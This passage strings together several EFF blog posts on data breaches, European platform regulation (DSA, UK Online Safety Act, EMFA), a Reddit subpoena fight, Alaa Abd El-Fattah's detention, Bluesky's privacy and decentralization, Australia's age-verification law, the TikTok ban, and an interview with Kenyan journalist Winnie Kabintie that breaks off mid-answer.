2,200 reported through the end of the third quarter. But 2,200 and counting is little comfort.\nWe did not investigate every one of these 2,000-plus data breaches, but we looked at a lot of them, including the news coverage and the data breach notification letters that many state Attorney General offices host on their websites. We can\u2019t award the coveted Breachie Award to every company that was breached this year. Still, here are some (dis)honorable mentions:\nADT, Advance Auto Parts, AT&T, AT&T (again), Avis, Casio, Cencora, Comcast, Dell, El Salvador, Fidelity, FilterBaby, Fortinet, Framework, Golden Corral, Greylock, Halliburton, HealthEquity, Heritage Foundation, HMG Healthcare, Internet Archive, LA County Department of Mental Health, MediSecure, Mobile Guardian, MoneyGram, muah.ai, Ohio Lottery, Omni Hotels, Oregon Zoo, Orrick, Herrington & Sutcliffe, Panda Restaurants, Panera, Patelco Credit Union, Patriot Mobile, pcTattletale, Perry Johnson & Associates, Roll20, Santander, Spytech, Synnovis, TEG, Ticketmaster, Twilio, USPS, Verizon, VF Corp, WebTPA.\nWhat now? Companies need to do a better job of only collecting the information they need to operate, and properly securing what they store. Also, the U.S. needs to pass comprehensive privacy protections. At the very least, we need to be able to sue companies when these sorts of breaches happen (and while we\u2019re at it, it\u2019d be nice if we got more than $5.21 checks in the mail). EFF has long advocated for a strong federal privacy law that includes a private right of action.<\/p><\/div><\/li> This post is part two\u00a0in a series of posts about EFF\u2019s work in Europe. Read about how and why we work in Europe here.\u00a0\nEFF\u2019s mission is to ensure that technology supports freedom, justice, and innovation for all people of the world. While our work has taken us to far corners of the globe, in recent years we have worked to expand our efforts in Europe, building up a policy team with key expertise in the region, and bringing our experience in advocacy and technology to the European fight for digital rights. \nIn this blog post series, we will introduce you to the various players involved in that fight, share how we work in Europe, and how what happens in Europe can affect digital rights across the globe.\u00a0 \nEFF\u2019s approach to free speech \nThe global spread of Internet access and digital services promised a new era of freedom of expression, where everyone could share and access information, speak out and find an audience without relying on gatekeepers and make, tinker with and share creative works.\u00a0\u00a0\nEveryone should have the right to express themselves and share ideas freely. Various European countries have experienced totalitarian regimes and extensive censorship in the past century, and as a result, many Europeans still place special emphasis on privacy and freedom of expression. These values are enshrined in the European Convention of Human Rights and the Charter of Fundamental Rights of the European Union \u2013 essential legal frameworks for the protection of fundamental rights. \u00a0\nToday, as so much of our speech is facilitated by online platforms, there is an expectation, that they too respect fundamental rights. Through their terms of services, community guidelines or house rules, platforms get to unilaterally define what speech is permissible on their services. The enforcement of these rules can be arbitrary, untransparent and selective, resulting in the suppression of contentious ideas and minority voices. \u00a0\nThat\u2019s why EFF has been fighting against both government threats to free expression and to hold tech companies accountable for grounding their content moderation practices in robust human rights frameworks. That entails setting out clear rules and standards for internal processes such as notifications and explanations to users when terms of services are enforced or changed. In the European Union, we have worked for decades to ensure that laws governing online platforms respect fundamental rights, advocated against censorship and spoke up on behalf of human rights defenders.\u00a0\nWhat\u2019s the Digital Services Act and why do we keep talking about it?\u00a0\nFor the past years, we have been especially busy\u00a0addressing human rights concerns with the drafting and implementation of the DSA\u00a0the Digital Services Act (DSA), the new law setting out the rules for online services in the European Union. The DSA covers most online services, ranging from online marketplaces like Amazon, search engines like Google, social networks like Meta and app stores. However, not all of its rules apply to all services \u2013 instead, the DSA follows a risk-based approach that puts the most obligations on the largest services that have the highest impact on users. All service providers must ensure that their terms of services respect fundamental rights, that users can get in touch with them easily, and that they report on their content moderation activities. Additional rules apply to online platforms: they must give users detailed information about content moderation decisions and the right to appeal and additional transparency obligations. They also have to provide some basic transparency into the functioning of their recommender systems and are not allowed to target underage users with personalized ads. The most stringent obligations apply to the largest online platforms and search engines, which have more than 45 million users in the EU. These companies, which include X, TikTok, Amazon, Google Search and Play, YouTube, and several porn platforms, must proactively assess and mitigate systemic risks related to the design, functioning and use of their service their services. These include risks to the exercise of fundamental rights, elections, public safety, civic discourse, the protection of minors and public health. This novel approach might have merit but is also cause for concern: Systemic risks are barely defined and could lead to restrictions of lawful speech, and measures to address these risks, for example age verification, have negative consequences themselves, like undermining users\u2019 privacy and access to information. \u00a0\nThe DSA is an important piece of legislation to advance users\u2019 rights and hold companies accountable, but it also comes with significant risks. We are concerned about the DSA\u2019s requirement that service providers proactively share user data with law enforcement authorities and the powers it gives government agencies to request such data. We caution against the misuse of the DSA\u2019s emergency mechanism and the expansion of the DSA\u2019s systemic risks governance approach as a catch-all tool to crack down on undesired but lawful speech. Similarly, the appointment of trusted flaggers could lead to pressure on platforms to over remove content, especially as the DSA does not limit government authorities from becoming trusted flaggers. \u00a0\nEFF has been advocating for lawmakers to take a measured approach that doesn\u2019t undermine the freedom of expression. Even though we have been successful in avoiding some of the most harmful ideas, concerns remain, especially with regards to the politicization of the enforcement of the DSA and potential over-enforcement. That\u2019s why we will keep a close eye on the enforcement of the DSA, ready to use all means at our disposal to push back against over-enforcement and to defend user rights. \u00a0\nEuropean laws often implicate users globally. To give non-European users a voice in Brussels, we have been facilitating the DSA Human Rights Alliance. The DSA HR Alliance is formed around the conviction that the DSA must adopt a human rights-based approach to platform governance and consider its global impact. We will continue building on and expanding the Alliance to ensure that the enforcement of the DSA doesn\u2019t lead to unintended negative consequences and respects users\u2019 rights everywhere in the world. \nThe UK\u2019s Platform Regulation Legislation\u00a0\nIn parallel to the Digital Services Act, the UK has passed its own platform regulation, the Online Safety Act (OSA). Seeking to make the UK \u201cthe safest place in the world to be online,\u201d the OSA will lead to a more censored, locked-down internet for British users. The Act empowers the UK government to undermine not just the privacy and security of UK residents, but internet users worldwide.\u00a0\nOnline platforms will be expected to remove content that the UK government views as inappropriate for children. If they don\u2019t, they\u2019ll face heavy penalties. The problem is, in the UK as in the U.S. and elsewhere, people disagree sharply about what type of content is harmful for kids. Putting that decision in the hands of government regulators will lead to politicized censorship decisions. \u00a0\nThe OSA will also lead to harmful age-verification systems. You shouldn\u2019t have to show your ID to get online. Age-gating systems meant to keep out kids invariably lead to adults losing their rights to private speech, and anonymous speech, which is sometimes necessary. \u00a0\nAs Ofcom is starting to release their regulations and guidelines, we\u2019re watching how the regulator plans to avoid these human rights pitfalls, and will continue any fighting insufficient efforts to protect speech and privacy online.\u00a0\u00a0\nMedia freedom and plurality for everyone\u00a0\nAnother issue that we have been championing is media freedom. Similar to the DSA, the EU recently overhauled its rules for media services: the European Media Freedom Act (EMFA). In this context, we pushed back against rules that would have forced online platforms like YouTube, X, or Instagram to carry any content by media outlets. Intended to bolster media pluralism, making platforms host content by force has severe consequences: Millions of EU users can no longer trust that online platforms will address content violating community standards. Besides, there is no easy way to differentiate between legitimate media providers, and such that are known for spreading disinformation, such as government-affiliated Russia sites active in the EU. Taking away platforms' possibility to restrict or remove such content could undermine rather than foster public discourse. \u00a0\nThe final version of EMFA introduced a number of important safeguards but is still a bad deal for users: We will closely follow its implementation to ensure that the new rules actually foster media freedom and plurality, inspire trust in the media and limit the use of spyware against journalists. \u00a0\nExposing censorship and defending those who defend us\u00a0\nCovering regulation is just a small part of what we do. Over the past years, we have again and again revealed how companies\u2019 broad-stroked content moderation practices censor users in the name of fighting terrorism, and restrict the voices of LGBTQ folks, sex workers, and underrepresented groups. \u00a0\nGoing into 2025, we will continue to shed light on these restrictions of speech and will pay particular attention to the\u00a0censorship of Palestinian voices, which has been rampant. We will continue collaborating with our allies in the Digital Intimacy Coalition to share how restrictive speech policies often disproportionally affect sex workers. We will also continue to closely analyze the impact of the increasing and changing use of artificial intelligence in content moderation. \u00a0\nFinally, a crucial part of our work in Europe has been speaking out for those who cannot: human rights defenders facing imprisonment and censorship. \u00a0\nMuch work remains to be done. We have put forward comprehensive policy recommendations to European lawmakers\u00a0and we will continue fighting for an internet where everyone can make their voice heard. In the next posts in this series, you will learn more about how we work in Europe to ensure that digital markets are fair, offer users choice and respect fundamental rights.\u00a0<\/p><\/div><\/li> In the early years of the internet, website administrators had to face off with a burdensome and expensive process to deploy SSL certificates. But today, hundreds of thousands of people have used EFF\u2019s free Certbot tool to spread\u00a0that sweet HTTPS across the web. Now almost all internet traffic is encrypted, and everyone gets a basic level of security. Small actions mean big change when we act together. Will you support important work like this and give EFF a Year-End Challenge boost?\nGive Today\nUnlock Bonus Grants Before 2025\nMake a donation of ANY SIZE by December 31 and you\u2019ll help us unlock bonus grants! Every supporter gets us closer to a series of seven Year-End Challenge milestones set by EFF\u2019s board of directors. These grants become larger as the number of online rights supporters grows. Everyone counts! See our progress.\n\ud83d\udea7 Digital Rights: Under Construction \ud83d\udea7\nSince 1990, EFF has defended your digital privacy and free speech rights in the courts, through activism, and by making open source privacy tools. This team is committed to watching out for the users no matter what directions technological innovation may take us. And that\u2019s funded entirely by donations.\n\n\n fix_copyright_and_stay_golden.png\n \n \n \n \n\n \n\nShow your support for digital rights with free EFF member gear.\nWith help from people like you, EFF has been able to help unravel legal and ethical questions surrounding the rise of AI; push the USPTO to withdraw harmful patent proposals; fight for the public's right to access police drone footage; and show why banning TikTok and passing laws like the Kids Online Safety Act (KOSA) will not achieve internet safety.\nAs technology\u2019s reach continues to expand, so do everyone\u2019s concerns about harmful side effects. That\u2019s where EFF\u2019s ample experience in tech policy, the law, and human rights shines. You can help us.\nDonate to defend digital rights today and you\u2019ll help us unlock bonus grants before the year ends.\nJoin EFF!\nProudly Member-Supported Since 1990\n________________________\nEFF is a member-supported U.S. 501(c)(3) organization. We\u2019re celebrating ELEVEN YEARS of top ratings from the nonprofit watchdog Charity Navigator! Your donation is tax-deductible as allowed by law.<\/p><\/div><\/li> Some people just can\u2019t take a hint. Today\u2019s perfect example is a group of independent movie distributors that have repeatedly tried, and failed, to force Reddit to give up the IP addresses of several users who posted about downloading movies.\u00a0 \nThe distributors claim they need this information to support their copyright claims against internet service provider Frontier Communications, because it might be evidence that Frontier wasn\u2019t enforcing its repeat infringer policy and therefore couldn\u2019t claim safe harbor protections under the Digital Millennium. Copyright Act. Courts have repeatedly refused to enforce these subpoenas, recognizing the distributors couldn\u2019t pass the test the First Amendment requires prior to unmasking anonymous speakers. \u00a0 \nHere's the twist: after the magistrate judge in this case applied this standard and quashed the subpoena, the movie distributors sought review from the district court judge assigned to the case. The second judge also denied discovery as unduly burdensome but, in a hearing on the matter, also said there was no First Amendment issue because the users were talking about copyright infringement. In their subsequent appeal to the Ninth Circuit, the distributors invite the appellate court to endorse the judge\u2019s statement.\u00a0 \nAs we explain in an amicus brief supporting Reddit, the court should refuse that invitation. Discussions about illegal activity clearly are protected speech. Indeed, the Supreme Court recently affirmed that even \u201cadvocacy of illegal acts\u201d is \u201cwithin the First Amendment\u2019s core.\u201d In fact, protecting such speech is a central purpose of the First Amendment because it ensures that people can robustly debate civil and criminal laws and advocate for change.\u00a0 \nThere is no reason to imagine that this bedrock principle doesn\u2019t apply just because the speech concerns copyright infringement \u2013 \u2014especially where the speakers aren\u2019t even defendants in the case, but independent third parties. And unmasking Does in copyright cases carries particular risks given the long history of copyright claims being used as an excuse to take down lawful as well as infringing content online.\u00a0 \nWe\u2019re glad to see Reddit fighting back against these improper subpoenas, and proud to stand with the company as it stands up for its users.\u00a0<\/p><\/div><\/li> As the UK\u2019s Prime Minister Keir Starmer and Foreign Secretary David Lammy have failed to secure the release of British-Egyptian blogger, coder, and activist Alaa Abd El-Fattah, UK politicians call for tougher measures to secure Alaa\u2019s immediate return to the UK.\nDuring a debate on detained British nationals abroad in early December, chairwoman of the Commons Foreign Affairs Committee Emily Thornberry asked the House of Commons why the UK has continued to organize industry delegations to Cairo while \u201cthe Egyptian government have one of our citizens\u2014Alaa Abd El-Fattah\u2014wrongfully held in prison without consular access.\u201d\nIn the same debate, Labour MP John McDonnell urged the introduction of a \u201cmoratorium on any new trade agreements with Egypt until Alaa is free,\u201d which was supported by other politicians. Liberal Democrat MP Calum Miller also highlighted words from Alaa, who told his mother during a recent prison visit that he had \u201chope in David Lammy, but I just can\u2019t believe nothing is happening...Now I think either I will die in here, or if my mother dies I will hold him to account.\u201d\nAlaa\u2019s mother, mathematician Laila Soueif, has been on hunger strike for 79 days while she and the rest of his family have worked to engage the British government in securing Alaa\u2019s release. On December 12, she also started protesting daily outside the Foreign Office and has since been joined by numerous MPs.\nSupport for Alaa has come from many directions. On December 6, 12 Nobel laureates wrote to Keir Starmer urging him to secure Alaa\u2019s immediate release \u201cNot only because Alaa is a British citizen, but to reanimate the commitment to intellectual sanctuary that made Britain a home for bold thinkers and visionaries for centuries.\u201d The pressure on Labour\u2019s senior politicians has continued throughout the month, with more than 100 MPs and peers writing to David Lammy on December 15 demanding Alaa\u2019 be freed.\u00a0 \u00a0\nAlaa should have been released on September 29, after serving his five-year sentence for sharing a Facebook post about a death in police custody, but Egyptian authorities have continued his imprisonment in contravention of the country\u2019s own Criminal Procedure Code. British consular officials are prevented from visiting him in prison because the Egyptian government refuses to recognise Alaa\u2019s British citizenship.\nDavid Lammy met with Alaa\u2019s family in November and promised to take action. But the UK\u2019s Prime Minister failed to raise the case at the G20 Summit in Brazil when he met with Egypt\u2019s President El-Sisi.\u00a0\nIf you\u2019re based in the UK, here are some actions you can take to support the calls for Alaa\u2019s release:\n\nWrite to your MP (external link): https:\/\/freealaa.net\/message-mp\u00a0\nJoin Laila Soueif outside the Foreign Office daily between 10-11am\nShare Alaa\u2019s plight on social media using the hashtag #freealaa\n\nThe UK Prime Minister and Foreign Secretary\u2019s inaction is unacceptable. Every second counts, and time is running out. The government must do everything it can to ensure Alaa\u2019s immediate and unconditional release.<\/p><\/div><\/li> Bluesky promises to rethink social media by focusing on openness and user control. But what does this actually mean for the millions of people joining the site?\nNovember was a good month for alternatives to X. Many users hit their balking point after two years of controversial changes turned Twitter into X, a restrictive hub filled with misinformation and hate speech. Musk\u2019s involvement in the U.S. presidential election was the last straw for many who are now looking for greener pastures.\nThreads, the largest alternative, grew about 15% with 35 million new users. However, the most explosive growth came from Bluesky, seeing over 500% growth and a total user base of over 25 million users at the time of writing.\nWe\u2019ve dug into the nerdy details of how Mastodon, Threads, and Bluesky compare, but given this recent momentum it\u2019s important to clear up some questions for new Bluesky users, and what this new approach to the social web really means for how you connect with people online.\nNote that Bluesky is still in an early stage, and many big changes are anticipated from the project. Answers here are accurate as of the time of writing, and will indicate the company\u2019s future plans where possible.\nIs Bluesky Just Another Twitter?\nAt face value the Bluesky app has a lot of similarities to Twitter prior to becoming X. That\u2019s by design: the Bluesky team has prioritized making a drop-in replacement for 2022 Twitter, so everything from the layout, posting options, and even color scheme will feel familiar to users familiar with that site.\u00a0\nWhile discussed in the context of decentralization, this experience is still very centralized like traditional social media, with a single platform controlled by one company, Bluesky PBLLC. However, a few aspirations from this company make it stand out:\u00a0\n\nPrioritizing interoperability and community development: Other platforms frequently get this wrong, so this dedication to user empowerment and open source tooling is commendable.\u00a0\n\u201cCredible Exit\u201d Decentralization: Bluesky the company wants Bluesky, the network, to be able to function even if the company is eliminated or \u2018enshittified.\u2019\n\nThe first difference is evident already from the wide variety of tools and apps on the network. From blocking certain content to highlighting communities you\u2019re a part of, there are a lot of settings to make your feed yours\u2014 some of which we walked through here. You can also abandon Bluesky\u2019s Twitter-style interface for an app like Firesky, which presents a stream of all Bluesky content. Other apps on the network can even be geared towards sharing audio, events, or work as a web forum, all using the same underlying AT protocol. This interoperable and experimental ecosystem parallels another based on the ActivityPub protocol, called \u201cThe Fediverse\u201d, which connects Threads to Mastodon as well as many other decentralized apps which experiment with the functions of traditional social media sites.\nThat \u201ccredible exit\u201d priority is less immediately visible, but explains some of the ways Bluesky looks different. The most visible difference is that usernames are domain names, with the default for new users being a subdomain of bsky.social. EFF set it up so that our account name is our website, @eff.org, which will be the case across the Bluesky network, even if viewed with different apps. Comparable to how Mastodon handles verification, no central authority or government documents are needed for verification, just proof of control over a site or record.\nAs Bluesky decentralizes, it is likely to diverge more from the Twitter experience as the tricky problems of decentralization creep in.\u00a0\nHow Is Bluesky for Privacy?\nWhile Bluesky is not engaged in surveillance-based advertising like many incumbent social media platforms, users should be aware that shared information is more public and accessible than they might expect.\nBluesky, the app, offers some sensible data-minimizing defaults like requiring user consent for third-party embedded media, which can include tracking. The real assurance to users, however, is that even if the flagship apps were to become less privacy protective, the open tools let others make full-featured alternative apps on the same network.\nHowever, by design, Bluesky content is fully public on the network. Users can change privacy settings to encourage apps on the network to require login to view your account, but it is optional to honor. Every post, every like, and every share is visible to the world. Even blocking data is plainly visible. By design all of this information is also accessible in one place, as Bluesky aims to be the megaphone for a global audience Twitter once was.\nThis transparency extends to how Bluesky handles moderation, where users and content are labeled by a combination of Bluesky moderators, community moderators, and automated labeling. The result is information about you will, over time, be held by these moderators to either promote or hide your content.\nUsers leaving X out of frustration for the platform using public content to feed AI training may also find that this approach of funneling all content into one stream is very friendly to scraping for AI training by third parties.\u00a0 Bluesky\u2019s CEO has been clear the company will not engage in AI licensing deals, but it\u2019s important to be clear this is inherent to any network prioritizing openness. The freedom to use public data for creative expression, innovation, and research extends to those who use it to train AI.\nUsers you have blocked may also be able to use this public stream to view your posts without interacting with you. If your threat model includes trolls and other bad actors who might reshare your posts in other contexts, this is important to consider.\nDirect messages are not included in this heap of public information. However they are not end-to-end encrypted, and only hosted by Bluesky servers. As was the case for X, that means any DM is visible to Bluesky PBLLC. DMs may be accessed for moderation, for valid police warrants, and may even one day be public through a data breach. Encrypted DMs are planned, but we advise sensitive conversations be moved to dedicated fully encrypted conversations.\nHow Do I Find People to Follow?\nTools like Skybridge are being built to make it easier for people to import their Twitter contacts into Bluesky. Similar to advice we gave for joining Mastodon, keep in mind these tools may need extensive account access, and may need to be re-run as more people switch networks.\nBluesky has also implemented \u201cstarter packs,\u201d which are curated lists of users anyone can create and share to new users. EFF recently put together a few for you to check out:\n\nElectronic Frontier Foundation Staff\nElectronic Frontier Alliance members\nDigital Rights, News & Advocacy\n\nIs Bluesky In the Fediverse?\n\u201cFediverse\u201d refers to a wide variety of sites and services generally communicating with each other over the ActivityPub protocol, including Threads, Mastodon, and a number of other projects. Bluesky uses the AT Protocol, which is not currently compatible with ActivityPub, thus it is not part of \u201cthe fediverse.\u201d\nHowever, Bluesky is already being integrated into the vision of an interoperable and decentralized social web. You can follow Bluesky accounts from the fediverse over RSS. A number of mobile apps will also seamlessly merge Bluesky and fediverse feeds and let you post to both accounts. Even with just one Bluesky or fediverse account, users can also share posts and DMs to both networks using a project called Bridgy Fed.\nIn recent weeks this bridging also opened up to the hundreds of millions of Threads users. It just requires an additional step of enabling fediverse sharing, before connecting to the fediverse Bridgy Fed account.\u00a0 We\u2019re optimistic that all of these projects will continue to improve integrations even more in the future.\nIs the Bluesky Network Decentralized?\nThe current Bluesky network is not decentralized.\u00a0\nIt is nearly all made and hosted by one company, Bluesky PBLLC, which is working on creating the \u201ccredible exit\u201d from their control as a platform host. If Bluesky the company and the infrastructure it operates disappeared tonight, however, the entire Bluesky network would effectively vanish along with it.\nOf the 25 million users, only 10,000 are hosted by a non-Bluesky services \u2014 most of which through fediverse connections. Changing to another host is also currently a one-way exit.\u00a0 All DMs rely on Bluesky owned servers, as does the current system for managing user identities, as well as the resource-intensive \u201cRelay\u201d server aggregating content from across the network. The same company also handles the bulk of moderation and develops the main apps used by most users. Compared to networks like the fediverse or even email, hosting your own Bluesky node currently requires a considerable investment.\nOnce this is no longer the case, a \u201ccredible exit\u201d is also not quite the same as \u201cdecentralized.\u201d An escape hatch for particularly dire circumstances is good, but it falls short of the distributed power and decision making of decentralized networks. This distinction will become more pressing as the reliance on Bluesky PBLLC is tested, and the company opens up to more third parties for each component of the network.\u00a0\nHow Does Bluesky Make Money?\nThe past few decades have shown the same \u2018enshittification\u2019 cycle too many times. A new startup promises something exciting, users join, and then the platform turns on users to maximize profits\u2014often through surveillance and restricting user autonomy.\u00a0\nWill Bluesky be any different? From the team\u2019s outlined plan we can glean that Bluesky promises not to use surveillance-based advertising, nor lock-in users. Bluesky CEO Jay Graber also promised to not sell user content to AI training licenses and intends to always keep the service free to join. Paid services like custom domain hosting or paid subscriptions seem likely.\u00a0\nSo far, though, the company relies on investment funding. It was initially incubated by Twitter co-founder Jack Dorsey\u2014 who has since distanced himself from the project\u2014and more recently received 8 million and 15 million dollar rounds of funding.\u00a0\nThat later investment round has raised concerns among the existing userbase that Bluesky would pivot to some form of cryptocurrency service, as it was led by Blockchain Capital, a cryptocurrency focused venture capital company which also had a partner join the Bluesky board. Jay Graber committed to \u201cnot hyperfinancialize the social experience\u201d with blockchain projects, and emphasized that Bluesky does not use blockchain.\nAs noted above, Bluesky has prioritized maintaining a \u201ccredible exit\u201d for users, a commitment to interoperability that should keep the company accountable to the community and hopefully prevent the kind of \u201censhittification\u201d that drove people away from X. Holding the company to all of these promises will be key to seeing the Bluesky network and the AT protocol reach that point of maturity.\nHow Does Moderation Work?\nOur comparison of Mastodon, Threads, and Bluesky gets into more detail, but as it stands Bluesky\u2019s moderation is similar to Twitter\u2019s before Musk. The Bluesky corporation uses the open moderation tools to label posts and users, and will remove users from their hosted services for breaking their terms of service. This tooling keeps the Bluesky company\u2019s moderation tied to its \u201ccredible exit\u201d goals, giving it the same leverage any other future operator might have. It also means\u00a0 Bluesky\u2019s centralized moderation of today can\u2019t scale, and even with a good faith effort it will run into issues.\nBluesky accounts for this by opening its moderation tools to the community. Advanced options are available under settings in the web app, and anyone can label content and users on the site. These labels let users filter, prioritize, or block content. However, only Bluesky has the power to \u201cdeplatform\u201d poorly behaved users by removing them, either by no longer hosting their account, no longer relaying their content to other users, or both.\nBluesky aspires to censorship resistance, and part of creating a \u201ccredible exit\u201d means reducing the company\u2019s ability to remove users entirely. In a future with a variety of hosts and relays on the Bluesky network, removing a user looks more like removing a website from the internet\u2014not impossible, but very difficult. Instead users will need to settle with filtering out or blocking speech they object to, and take some comfort that voices they align with will not be removed from the network.\u00a0\nThe permeability of Bluesky also means community tooling will need to address network abuses, like last May when a pro-Trump botnet on Nostr bridged to Bluesky via Mastodon to flood timelines. It\u2019s possible that like in the Fediverse, Bluesky may eventually form a network of trusted account hosts and relays to mitigate these concerns. \nBluesky is still a work in progress, but its focus on decentralization, user control, and interoperability makes it an exciting space to watch. Whether you\u2019re testing the waters or planning a full migration, these insights should help you navigate the platform.<\/p><\/div><\/li> Age verification systems are surveillance systems that threaten everyone\u2019s privacy and anonymity. But Australia\u2019s government recently decided to ignore these dangers, passing a vague, sweeping piece of age verification legislation after giving only a day for comments. The Online Safety Amendment (Social Media Minimum Age) Act 2024, which bans children under the age of 16 from using social media, will force platforms to take undefined \u201creasonable steps\u201d to verify users\u2019 ages and prevent young people from using them, or face over $30 million in fines.\u00a0\nThe country\u2019s Prime Minister, Anthony Albanese, claims that the legislation is needed to protect young people in the country from the supposed harmful effects of social media, despite no study showing such an impact. This legislation will be a net loss for both young people and adults who rely on the internet to find community and themselves.\nThe law does not specify which social media platforms will be banned. Instead, this decision is left to Australia\u2019s communications minister who will work alongside the country\u2019s internet regulator, the eSafety Commissioner, to enforce the rules. This gives government officials dangerous power to target services they do not like, all at a cost to both minor and adult internet users.\nThe legislation also does not specify what type of age verification technology will be necessary to implement the restrictions but prohibits using only government IDs for this purpose. This is a flawed attempt to protect privacy. \nSince platforms will have to provide other means to verify their users' ages other than by government ID, they will likely rely on unreliable tools like biometric scanners. The Australian government awarded the contract for testing age verification technology to a UK-based company, Age Check Certification Scheme (ACCS) who, according to the company website, \u201ccan test all kinds of age verification systems,\u201d including \u201cbiometrics, database lookups, and artificial intelligence-based solutions.\u201d\u00a0\nThe ban will not take effect for at least another 12 months while these points are decided upon, but we are already concerned that the systems required to comply with this law will burden all Australians\u2019 privacy, anonymity, and data security.\nBanning social media and introducing mandatory age verification checks is the wrong approach to protecting young people online, and this bill was hastily pushed through the Parliament of Australia with little oversight or scrutiny. We urge politicians in other countries\u2014like the U.S. and France\u2014to explore less invasive approaches to protecting all people from online harms\u00a0and focus on comprehensive privacy protections, rather than mandatory age verification.<\/p><\/div><\/li> The TikTok ban itself and the DC Circuit's approval of it should be of great concern even to those who find TikTok undesirable or scary. Shutting down communications platforms or forcing their reorganization based on concerns of foreign propaganda and anti-national manipulation is an eminently anti-democratic tactic, one that the U.S. has previously condemned globally.\nThe U.S. government should not be able to restrict speech\u2014in this case by cutting off a tool used by 170 million Americans to receive information and communicate with the world\u2014without proving with evidence that the tools are presently seriously harmful. But in this case, Congress has required and the DC Circuit approved TikTok\u2019s forced divestiture based only upon fears of future potential harm. This greatly lowers well-established standards for restricting freedom of speech in the U.S.\u00a0\nSo we are pleased that the Supreme Court will take the case and will urge the justices to apply the appropriately demanding First Amendment scrutiny.<\/p><\/div><\/li> Winnie Kabintie is a journalist and Communications Specialist based in Nairobi, Kenya. As an award-winning youth media advocate, she is passionate about empowering young people with Media and Information Literacy skills, enabling them to critically engage with and shape the evolving digital\u00a0 media landscape in meaningful ways.\nGreene: To get us started, can you tell us what the term free expression means to you?\u00a0\nI think it's the opportunity to speak in a language that you understand and speak about subjects of concern to you and to anybody who is affected or influenced by the subject of conversation. To me, it is the ability to communicate openly and share ideas or information without interference, control, or restrictions.\u00a0\nAs a journalist, it means having the freedom to report on matters affecting society and my work without censorship or limitations on where that information can be shared. Beyond individual expression, it is also about empowering communities to voice their concerns and highlight issues that impact their lives. Additionally, access to information is a vital component of freedom of expression, as it ensures people can make informed decisions and engage meaningfully in societal discourse because knowledge is power.\nGreene: You mention the freedom to speak and to receive information in your language. How do you see that currently? Are language differences a big obstacle that you see currently?\u00a0\nIf I just look at my society\u2014I like to contextualize things\u2014we have Swahili, which is a national language, and we have English as the secondary official language. But when it comes to policies, when it comes to public engagement, we only see this happening in documents that are only written in English. This means when it comes to the public barazas (community gatherings) interpretation is led by a few individuals, which creates room for disinformation and misinformation. I believe the language barrier is an obstacle to freedom of speech. We've also seen it from the civil society dynamics, where you're going to engage the community but you don't speak the same language as them, then it becomes very difficult for you to engage them on the subject at hand. And if you have to use a translator, sometimes what happens is you're probably using a translator for whom their only advantage, or rather the only advantage they bring to the table, is the fact that they understand different languages. But they're not experts in the topic that you're discussing.\nGreene: Why do you think the government only produces materials in English? Do you think part of that is because they want to limit who is able to understand them? Or is it just, are they lazy or they just disregard the other languages?\u00a0\nIn all fairness, I think it comes from the systematic approach on how things run. This has been the way of doing things, and it's easier to do it because translating some words from, for example, English to Swahili is very hard. And you see, as much as we speak Swahili in Kenya\u2014and it's our national language\u2014the kind of Swahili we speak is also very diluted or corrupted with English and Sheng\u2014I like to call \u201cki-shenglish\u201d. I know there were attempts to translate the new Kenyan Constitution, and they did translate some bits of the summarized copy, but even then it wasn\u2019t the full Constitution. We don't even know how to say certain words in Swahili from English which makes it difficult to translate many things. So I think it's just an innocent omission.\u00a0\nGreene: What makes you passionate about freedom of expression?\n\u00a0As a journalist and youth media advocate, my passion for freedom of expression stems from its fundamental role in empowering individuals and communities to share their stories, voice their concerns, and drive meaningful change. Freedom of expression is not just about the right to speak\u2014it\u2019s about the ability to question, to challenge injustices, and to contribute to shaping a better society.\nFor me, freedom of expression is deeply personal as I like to question, interrogate and I am not just content with the status quo. As a journalist, I rely on this freedom to shed light on critical issues affecting society, to amplify marginalized voices, and to hold power to account. As a youth advocate, I\u2019ve witnessed how freedom of expression enables young people to challenge stereotypes, demand accountability, and actively participate in shaping their future. We saw this during the recent Gen Z revolution in Kenya when youth took to the streets to reject the proposed Finance Bill.\nFreedom of speech is also about access. It matters to me that people not only have the ability to speak freely, but also have the platforms to articulate their issues. You can have all the voice you need, but if you do not have the platforms, then it becomes nothing. So it's also recognizing that we need to create the right platforms to advance freedom of speech. These, in our case, include platforms like radio and social media platforms.\u00a0\nSo we need to ensure that we have connectivity to these platforms. For example, in the rural areas of our countries, there are some areas that are not even connected to the internet. They don't have the infrastructure including electricity. It then becomes difficult for those people to engage in digital media platforms where everybody is now engaging. I remember recently during the Reject Finance Bill process in Kenya, the political elite realized that they could leverage social media and meet with and engage the youth. I remember the President was summoned to an X-space and he showed up and there was dialogue with hundreds of young people. But what this meant was that the youth in rural Kenya who didn\u2019t have access to the internet or X were left out of that national, historic conversation. That's why I say it's not just as simple as saying you are guaranteed freedom of expression by the Constitution. It's also how governments are ensuring that we have the channels to advance this right.\u00a0\nGreene: Have you had a personal experience or any personal experiences that shaped how you feel about freedom of expression? Maybe a situation where you felt like it was being denied to you or someone close to you was in that situation?\nAt a personal level I believe that I am a product of speaking out and I try to use my voice to make an impact! There is also this one particular incident that stands out during my early career as a journalist. In 2014 I amplified a story from a video shared on facebook by writing a news article that was published on The Kenya Forum, which at the time was one of the two publications that were fully digital in the country covering news and feature articles.\nThe story, which was a case of gender based assault, gained traction drawing attention to the unfortunate incident that had seen a woman stripped naked allegedly for being \u201cdressed indecently.\u201d The public uproar sparked the famous #MyDressMyChoice protest in Kenya where women took to the streets countrywide to protest against sexual violence.\nGreene: Wow. Do you have any other specific stories that you can tell about the time when you spoke up and you felt that it made a difference? Or maybe you spoke up, and there was some resistance to you speaking up?\u00a0\nI've had many moments where I've spoken up and it's made a difference including the incident I shared in the previous question. But, on the other hand, I also had a moment where I did not speak out years ago, when a classmate in primary school was accused of theft.\u00a0\nThere was this girl once in class, she was caught with books that didn't belong to her and she was accused of stealing them. One of the books she had was my deskmate\u2019s and I was there when she had borrowed it. So she was defending herself and told the teacher, \u201cWinnie was there when I borrowed the book.\u201d When the teacher asked me if this was true I just said, \u201cI don't know.\u201d That feedback was her last line of defense and the girl got expelled from school. So I\u2019ve always wondered, if I'd said yes, would the teacher have been more lenient and realized that she had probably just borrowed the rest of the books as well? I was only eight years old at the time, but because of that, and how bad the outcome made me feel, I vowed to myself to always stand for the truth even when it\u2019s unpopular with everyone else in the room. I would never look the other way in the face of an injustice or in the face of an issue that I can help resolve. I will never walk away in silence.\nGreene: Have you kept to that since then?\u00a0\nAbsolutely.\nGreene: Okay, I want to switch tracks a little bit. Do you feel there are situations where it's appropriate for government to limit someone's speech?\nYes, absolutely. In today\u2019s era of 